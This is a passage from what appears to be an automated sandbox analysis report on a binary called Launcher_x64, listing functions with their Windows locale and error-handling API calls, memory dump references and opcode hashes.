                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c86ac0f65adcfe469dc823ba5626e541995c9291179e98c65dff5bbb9a177cd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7321B331656226ABDB289F24EC41ABA73A8EF64318F14007AFD01C6241EF74ED40AA70
                                                                                                                                                                                                                                                                                        Function 00D1AC41 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: a5c725318475a9c98142dc01643ef39430c79d5b6df5239ec4a0708b8c8bcdc3
                                                                                                                                                                                                                                                                                        • Instruction ID: 1180d8cfce4a77957a1b2df9c86e0413b8e8ab42e9004f12821f272b4dc31e2c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5c725318475a9c98142dc01643ef39430c79d5b6df5239ec4a0708b8c8bcdc3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EB1E770A02A06ABCB258E6CB5556FE77B1EF01310F18461EE49297A91DF31DAC1CB73
                                                                                                                                                                                                                                                                                        Function 00D28630 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00D286CB,00000001,00000000,?,-00000050,?,00D284BB,00000000,-00000002,00000000,?,00000055,?), ref: 00D286A2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                                        • Opcode ID: bcc59ff4c6c076a7e753b1014dbfb1d4d5d15ba9d66be832d89f3f9fc4b5ecd4
                                                                                                                                                                                                                                                                                        • Instruction ID: 58b9851437ee5793eed15c2b9eda83a05bd97bf80db55e700bd6cb113e322420
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcc59ff4c6c076a7e753b1014dbfb1d4d5d15ba9d66be832d89f3f9fc4b5ecd4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E011293A2007115FDB18AF38E89167AB791FF9031EB19442CE94787640E775B942D760
                                                                                                                                                                                                                                                                                        Function 00D28A9D Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D28AF1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 242bc8f3d887b010f4a77dd187ab9a1ef617ff80fe53717e3a6162b4465e2b48
                                                                                                                                                                                                                                                                                        • Instruction ID: 8dc65013347198b9d0b9e105a4271a814c231ed96522c743c32e88f32ce0e99e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 242bc8f3d887b010f4a77dd187ab9a1ef617ff80fe53717e3a6162b4465e2b48
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86110A726111169BDB14AF24EC02ABA73ECDF54318B14407AE505C7241DF38ED01D770
                                                                                                                                                                                                                                                                                        Function 00D28C4A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00D288E7,00000000,00000000,?), ref: 00D28C76
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5657b4c18ab2dd056ed1a18688f5cf1129b4e8d4e9b720f5353792c3cacdbdc6
                                                                                                                                                                                                                                                                                        • Instruction ID: 2fdd76c6b6e0dc5f04a8b485f2ba6635297b0630ab6cb20f0991cf022d861d83
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5657b4c18ab2dd056ed1a18688f5cf1129b4e8d4e9b720f5353792c3cacdbdc6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F301DB326065226BDF2C5724A8057BA3754DB50359F194429AC46A3280EF74FE51F5B0
                                                                                                                                                                                                                                                                                        Function 00D2891E Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00D2897D,00000001,?,?,-00000050,?,00D28483,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00D28968
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0b82a0c2e973c706c2c0e3f4d1d592aa629fe6f58c208cab18503f11b9348a6c
                                                                                                                                                                                                                                                                                        • Instruction ID: 85a3b3308c57f466df3a7341db5df93c6443a7811753143edfa8b5b94f43f4f1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b82a0c2e973c706c2c0e3f4d1d592aa629fe6f58c208cab18503f11b9348a6c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3F046322013145FCB245F38BC81A7A7B91EF9036CB18442CF9418B690CAB2AC82DB70
                                                                                                                                                                                                                                                                                        Function 00D243A7 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D1F547: EnterCriticalSection.KERNEL32(?,?,00D1CD41,00000000,00D3E728,0000000C,00D1CCFA,00001000,?,00D244CA,00001000,?,00D235B1,00000001,00000364,?), ref: 00D1F556
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00D2439A,00000001,00D3EBA0,0000000C,00D23DA8,-00000050), ref: 00D243DF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f8fad99a92c93b4cf97cfdbd32693d98183a5046d8b77ebc08aabd3b10fc9e12
                                                                                                                                                                                                                                                                                        • Instruction ID: 9eff9f63f7f669b6252b977916fff10ee65278acfb683add17feb497386c5a54
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8fad99a92c93b4cf97cfdbd32693d98183a5046d8b77ebc08aabd3b10fc9e12
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EF01436A00300AFDB04EF98E842B9D77A0EB45724F10416AF410DB3A0DBB55940CF70
                                                                                                                                                                                                                                                                                        Function 00D28A52 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00D28A9D,00000001,?,?,?,00D284DD,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00D28A89
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 59fb9f513f3fb24524434b1d11c5e336003cac0cbfb092b85539925b52e22582
                                                                                                                                                                                                                                                                                        • Instruction ID: 145070a7011f1773f0169b598d4bd6a203d71591d4b06bb4388633206ec52aa8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59fb9f513f3fb24524434b1d11c5e336003cac0cbfb092b85539925b52e22582
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6CF055363043155BCB04AF35F80566A7F94EFC1728B0A005AEA068B240CA71E982DBB0
                                                                                                                                                                                                                                                                                        Function 00D23EAC Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00D1E2A3,?,20001004,00000000,00000002,?,?,00D1D1B5), ref: 00D23EE0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2d41d830336ecb19f8fdfb57b6c453c25e61541251c3e2e11dcca1de69116bfb
                                                                                                                                                                                                                                                                                        • Instruction ID: 66969eb7b6544adae74c8f93c1eb378a65c22839c7868b99b196247c998111b4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d41d830336ecb19f8fdfb57b6c453c25e61541251c3e2e11dcca1de69116bfb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CE04F3150023CBBCF226F61FC05AAE3E5AEF547A4F054411FD1566261CB368920AAB4
                                                                                                                                                                                                                                                                                        Function 00D1651C Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001663D), ref: 00D16521
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f04981580376c54d658e66c560dfa666f21a06facd73b5faebc4b3eb094a90d2
                                                                                                                                                                                                                                                                                        • Instruction ID: 590d945bbafa92ad5f24cf3bd4ef83bf878d974298e86365c4643a8e6f06663c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f04981580376c54d658e66c560dfa666f21a06facd73b5faebc4b3eb094a90d2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                        Function 00D24ABC Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4d0b5ff96482461a80554ab79d908f2287f0ed5455ffb9e621f52d67ccec4d45
                                                                                                                                                                                                                                                                                        • Instruction ID: 3e154ef0cb8451951d1aeb0df47b0fc69a6b48971588c73f7fc0750dcfaa175a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d0b5ff96482461a80554ab79d908f2287f0ed5455ffb9e621f52d67ccec4d45
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55A00178602305CBA7548F35BB0A3293AAAAA86691745406DA509C5260EA2894509E21
                                                                                                                                                                                                                                                                                        Function 00D01000 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 835e93e315a1489a60edd3b4a615a23b8f0ac8c2783df1799a65006cb9cc36b9
                                                                                                                                                                                                                                                                                        • Instruction ID: a13d6d7cf92c177c07117e86705f87953345e8d68e71d990b27cf1f3b27f3829
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 835e93e315a1489a60edd3b4a615a23b8f0ac8c2783df1799a65006cb9cc36b9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C519AB4D0020E9FCB44DFA8D591AEEBBF4EB09350F24845AE859FB350D734AA41CB65
                                                                                                                                                                                                                                                                                        Function 00D016C0 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
